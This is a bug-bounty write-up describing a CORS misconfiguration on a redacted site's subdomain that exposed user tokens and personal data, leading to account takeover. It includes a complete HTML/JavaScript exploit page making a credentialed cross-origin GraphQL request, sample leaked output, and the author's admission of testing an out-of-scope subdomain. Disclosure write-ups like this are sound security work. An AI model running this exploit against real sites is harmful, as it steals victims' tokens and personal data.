Cors Misconfiguration : Steal victim token and PII leads to ATO
Hello Friends .
today i will talk about a bug i found it on July 2020 on Pvt program on HackerOne. the bug named “Cross Origin Resource Sharing Misconfiguration{CORS}”.
1-firstly what is CORS?
Cross-Origin Resource Sharing(CORS) is a mechanism that enables web browsers to perform cross-domain requests using the XMLHttpRequest API in a controlled manner. These cross-origin requests have an Origin header, that identifies the domain initiating the request. It defines the protocol to use between a web browser and a server to determine whether a cross-origin request is allowed.
2-Summary
After reviewing the Program Scope ,I concluded all subdomains are out of scope , just the main domain are In Scope.
3-Steps To Reproduce
Day one : i started hunting in the main domain www.redact.com, i understand how the program services works , also testing bugs but the site is more secure..
Day two : i back to my testing again , when i viewed the Source code i noticed a subdomain in the code named core-plugins.redact.com
i know out of scope, but my mind tell test it..
the subdomain core-plugins.redact.com do not have a registration page . i can just login with my account on the main domain (SSO)
after login i found this request
he printed PII info on response. Token,email,userinfo…etc
then i noticed the “{Access Control Allow Credentials: true}” so i changed the origin , i deleted core-plugins.redact.com and i added https://evil.com. and it’s work !
Then i edited the graphql request to steal more info .
4-Exploition Code
<!DOCTYPE html>
<html>
<head>
<script>
function cors_exploit() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById(“demo”).innerHTML = alert(this.responseText);
}
};
xhttp.open(“GET”, “https://core-plugins.redact.com/graphql?app=web&query=query%20App%20{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</head>
<body onload=cors_exploit()>
<center>
<h2>Exploiting CORS Vulnerability </h2>
<h3>Extract SID</h3><div id=cors>
<button type=”button” onclick=cors_exploit()> Exploit</button>
</div>
</body>
</html>
Then i uploaded it to my website www.mysite.com/cors.html and it’s work the Data was printed
{ “data”: { “customer”: { “id”: “u285728853”, “username”: “storedthings133776”, “full_name”: null, “email”: “storedthings1337@gmail.com”, “is_admin”: false, “is_premier”: false, “is_premier_parent”: false, “premier_permissions”: [], “user_type”: “core user”, “organization_id”: null, “customer_id”: “285728853”, “hostname”: “core-plugins.redact.com”, “token”: “1/eyJjbGllbnRfaWQiOiI3YTE*****************” } }, “extensions”: {} }
5-The Token
The attacker could Access to the victim accounts through the token And perform any actions behalf the victim and view other Endpoints in API
